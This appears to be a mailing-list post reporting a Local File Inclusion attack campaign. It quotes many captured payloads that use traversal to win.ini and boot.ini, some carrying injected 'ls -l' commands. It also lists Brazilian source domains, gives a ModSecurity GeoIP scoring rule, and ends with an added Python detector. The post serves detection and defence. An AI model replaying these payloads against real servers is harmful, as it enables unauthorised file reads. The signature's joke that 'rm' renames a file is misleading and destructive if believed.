Our web sensors picked up a big uptick in Local File Inclusion (LFI) attacks today. We received 3675 attacks that targeted a wide range of applications, all attempting to use directory traversals to access:

Windows\win.ini
boot.ini

Here is a sampling of attack payloads:

GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /wp-trackback.php?p=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /forum.php?mod=viewthread&tid=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=site_map&zenid=/boot.ini%00
GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=featured_products&zenid=/boot.ini%00
GET /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00
GET /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00
GET /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00
GET /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=privacy&zenid=/boot.ini%00
GET /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=conditions&zenid=/boot.ini%00
GET /wp-content/plugins/download-monitor/download.php?id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%00
GET /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%00
GET /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=contact_us&zenid=/boot.ini%00
GET /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=gv_faq&zenid=/boot.ini%00
GET /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00
GET /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00
GET /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=reviews&zenid=/boot.ini%00
GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00
GET /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=specials&zenid=/boot.ini%00
GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00
GET /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00
GET /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=login&zenid=/boot.ini%00
GET /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00
GET /index.php?showtopic=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%00
GET /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00

We identified this attack through two methods of our commercial rules feed:

LFI virtual patching rules
A big increase in unique malicious IP addresses (for our IP Reputation Feed). We normally have between 500 and 800 IP addresses in our list per day. Today's IP Reputation Blacklist jumped up to 2339.

After analyzing the source IP addresses, it was clear that this LFI attack campaign was orchestrated by attacker(s) in Brazil. Here is a listing of the Brazilian domains we identified:

ac.gov.br

aerotelecom.com.br
ampernet.com.br
atena.anhembi.ind.br
brma.santacasasp.org.br
cable.cabotelecom.com.br
cable.infolic.com.br
certelnet.com.br
cianetwork.com.br
claro.net.br
cpnet.com.br
customer.tdatabrasil.net.br
customer.telesp.net.br
dedicated.neoviatelecom.com.br
ded.intelignet.com.br
ded.srt.net.br
desktop.com.br
dezinternet.com.br
dial-up.telesp.net.br
din.wln.net.br
dsl.brasiltelecom.net.br
dsl.ccoce700.brasiltelecom.net.br
dsl.pmjce700.brasiltelecom.net.br
dsl.telesp.net.br
dynamic.adsl.gvt.net.br
dynamic.conectcor.com.br
dynamic.dialup.gvt.net.br
dynamic.idial.com.br
dynamic.neoviatelecom.com.br
e.brasiltelecom.net.br
e.ccoce700.brasiltelecom.net.br
e.pmjce700.brasiltelecom.net.br
fia.com.br
fw-cruz2.mma.com.br
gaccbahia.sdr.gvt.net.br
gate.futurecomp.com.br
geoposition.com.br
gw-acad-pf.upf.br
hc-gw.unicamp.br
host.gvt.net.br
http.kraftweb.com.br
ibys.com.br
i-next.psi.br
intercampo.com.br
interline.net.br
ip18.unb.org.br
ipd.brasiltelecom.net.br
ipd.brcentral.net.br
isa2.eptv.com.br
isp.timbrasil.com.br
itake.net.br
jupiter.sulpol.com.br
kratos.tdkom.psi.br
mail01.fundacaoaltinoventura.org.br
mail2.metroval.com.br
mail6.aralco.com.br
mail.aralco.com.br
mail.centraldopapel.com.br
mail.hci.ind.br
mail.nardini.ind.br
marinter.com.br
marte.ceron.com.br
mhnet.com.br
minasmaistelecom.com.br
mobile.jabursat.com.br
mx.0.rossi.com.br
neowave.com.br
nereu.vipway.net.br
nqt.com.br
ns1.vipel.ind.br
ns.argosguindastes.com.br
osprey2.certelnet.com.br
osprey.certelnet.com.br
p4net.com.br
poolip.BHE.embratel.net.br
prontonet.com.br
provale.com.br
proxy1.recife.pe.gov.br
rco.gvt.net.br
res-com.wayinternet.com.br
rline.com.br
sercomtel.com.br
server.smsr.com.br
servidor1.actioncentro.net.br
speedycti.com.br
srv.tecnolab.com.br
static.ctbctelecom.com.br
static.gotelecom.com.br
static.gvt.net.br
static.impsat.net.br
static.ntbr.com.br
static-pr082.redetelesul.com.br
static.spo.ctbc.com.br
static.starweb.net.br
static.stech.net.br
static-stz.convex.com.br
tcvnet.com.br
telemar.net.br
tpa.net.br
tpnet.psi.br
ufpa.br
uninetbsb.com.br
unotel.com.br
user.ajato.com.br
user.dynamic.dipelnet.com.br
user.superilinhares.com.br
user.superitelecom.com.br
user.veloxzone.com.br
user.vivozap.com.br
v4.naclick.com.br
veiculos.jelta.com.br
viacaboip.com.br
viaembratel.net.br
viafibra.com.br
virtua.com.br
wcs.net.br
web.ceralpisos.com.br
webmail.ro.senac.br
wifi.tcheturbo.com.br
wlan.lpnet.com.br
www2.ceralpisos.com.br
xd-dynamic.ctbcnetsuper.com.br
xdsl-dinamico.ctbcnetsuper.com.br

Assigning Risk Scores

If you are using ModSecurity to protect your web applications, and your user base does not normally originate in Brazil, you may want to consider implementing some GeoIP rules to help raise the potential Threat Score.

# Load the GeoIP database that the @geoLookup operator consults
SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat

# Resolve the client address to a location and populate the GEO collection
SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"

# Add 10 to the transaction's threat score when the country code is BR; "pass" only scores, it does not block
SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"

This would raise the Threat Score for this transaction. You could, however, even block based solely on this information if you were sure that you have no legitimate clients from this geographic location. Simply change the "pass" action to "block".

-- 
"I want to know how to rename a file," he says.
Please, it's payday, isn't it?! But I'm in a good mood.
"Sure. Just type 'rm' and the file name."
"Thanks."

Noilson Caio T. de Araújo
Linux Professional Institute Certification
LPI000182893
Novell Certified Linux Administrator (CLA)
10111916
Novell Data Center Technical Specialist
http://ncaio.ithub.com.br
http://www.commandlinefu.com/commands/by/ncaio
http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php
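As an added example that is not part of the original post or of ModSecurity's own rule set, the script below shows the two detection signals the post describes and the scoring idea from its GeoIP rule in working code: it normalises request URIs the way a WAF transformation chain does (percent-decoding repeated until the value stops changing, backslash folded to slash, lowercase), flags the traversal, absolute-path and null-byte indicators visible in the payloads quoted above, counts unique attacking source addresses (the IP-reputation signal), and assigns a threat score in the spirit of the post's rule, where a high-risk country alone only raises the score and a country plus a probe crosses the block threshold. The sample log lines, the IP-to-country map (standing in for the GeoLiteCity.dat lookup), the 5 points per indicator and the block threshold of 15 are all constructed assumptions for this example; the only value taken from the post is the +10 for a high-risk source location.

```python
"""Added example (not from the original post): normalise request URIs, flag the
LFI probes quoted above, count unique attacking addresses, and score each hit.
Sample log lines and the IP-to-country map below are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx combined-log line; the sample data uses RFC 5737 documentation ranges.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Files the campaign above probed for; extend the tuple for other platforms (e.g. /etc/passwd).
SENSITIVE_FILES = ("boot.ini", "win.ini")
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')
# The file name must end a path segment: followed by a null byte or end of value,
# so "/uploads/win.ini.png" is not a hit but "/windows/win.ini%00" is.
TARGET_RE = re.compile(
    r'(?:^|/)(?:' + '|'.join(re.escape(f) for f in SENSITIVE_FILES) + r')(?:\x00|$)'
)


def normalize(value, max_rounds=4):
    """Percent-decode until the value stops changing (catches %252f double encoding),
    then fold backslashes to slashes and lowercase, so that ..%5cWINDOWS%5cwin.ini
    and ../windows/win.ini compare equal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/").lower()


def classify_uri(uri):
    """Return the sorted list of LFI indicators found in a request URI (empty when
    nothing looks like a probe). The path and every query value are checked
    separately; %00 is flagged on its own because it is the classic way to
    truncate an extension that the application appends."""
    raw_path, _, raw_query = uri.partition("?")
    pieces = [raw_path] + [p.partition("=")[2] for p in raw_query.split("&") if p]
    found = set()
    for piece in pieces:
        value = normalize(piece)
        has_traversal = bool(TRAVERSAL_RE.search(value))
        has_target = bool(TARGET_RE.search(value))
        if "\x00" in value:
            found.add("null-byte")
        if has_traversal and has_target:
            found.add("traversal-to-sensitive-file")
        elif has_target and value.startswith("/"):
            found.add("absolute-path-to-sensitive-file")
    return sorted(found)


# Constructed stand-in for the GeoIP lookup the post's SecRule performs.
COUNTRY_OF = {"198.51.100.7": "BR", "203.0.113.9": "BR", "192.0.2.44": "US", "192.0.2.45": "DE"}
HIGH_RISK_COUNTRIES = {"BR"}
POINTS_PER_INDICATOR = 5   # assumption for this example
BLOCK_THRESHOLD = 15       # assumption for this example


def threat_score(ip, indicators):
    """Anomaly-style scoring: +10 for a high-risk source location (the post's
    setvar:tx.threat_score=+10) plus POINTS_PER_INDICATOR per LFI indicator.
    Geography alone stays below the threshold; geography plus a probe blocks."""
    score = 10 if COUNTRY_OF.get(ip) in HIGH_RISK_COUNTRIES else 0
    score += POINTS_PER_INDICATOR * len(indicators)
    return score, ("block" if score >= BLOCK_THRESHOLD else "pass")


def analyze(log_text):
    """Parse log lines and return (hits, unique_attacking_ips); each hit is
    (ip, uri, indicators, score, decision)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_uri(m.group("uri"))
        if indicators:
            score, decision = threat_score(m.group("ip"), indicators)
            hits.append((m.group("ip"), m.group("uri"), indicators, score, decision))
    unique_ips = Counter(hit[0] for hit in hits)
    return hits, unique_ips


# Constructed sample traffic: two probing hosts, two benign requests.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2010:10:00:01 -0500] "GET /forum/index.php?p=..%5c..%5c..%5c..%5cwindows%5cwin.ini%00 HTTP/1.1" 200 512
198.51.100.7 - - [10/Mar/2010:10:00:02 -0500] "GET /index.php?main_page=site_map&zenid=../../../../../../boot.ini%00 HTTP/1.1" 200 1024
203.0.113.9 - - [10/Mar/2010:10:00:03 -0500] "GET /index.php?main_page=site_map&zenid=/boot.ini%00 HTTP/1.1" 404 0
203.0.113.9 - - [10/Mar/2010:10:00:04 -0500] "GET /take-quiz/index.php?album=..%252f..%252fboot.ini HTTP/1.1" 200 300
192.0.2.44 - - [10/Mar/2010:10:00:05 -0500] "GET /index.php?main_page=product_info&products_id=638 HTTP/1.1" 200 8192
192.0.2.45 - - [10/Mar/2010:10:00:06 -0500] "GET /wp-content/uploads/win.ini.png HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    hits, unique_ips = analyze(SAMPLE_LOG)
    for ip, uri, indicators, score, decision in hits:
        print(f"{decision:5} score={score:2} {ip:14} {uri}  {indicators}")
    print(f"unique attacking IPs today: {len(unique_ips)}")
```

Run directly, the script reports four flagged requests from two addresses and leaves the two benign lines alone. The `win.ini.png` request is there to show why the sensitive-file match is anchored to the end of a path segment rather than being a bare substring search, and the `%252f` line shows why decoding has to be repeated until it stops changing. In ModSecurity itself this normalisation is what the `t:urlDecodeUni`, `t:normalisePathWin` and `t:lowercase` transformations provide, and the score-then-decide step corresponds to the post's suggestion of raising `tx.threat_score` rather than blocking on geography alone.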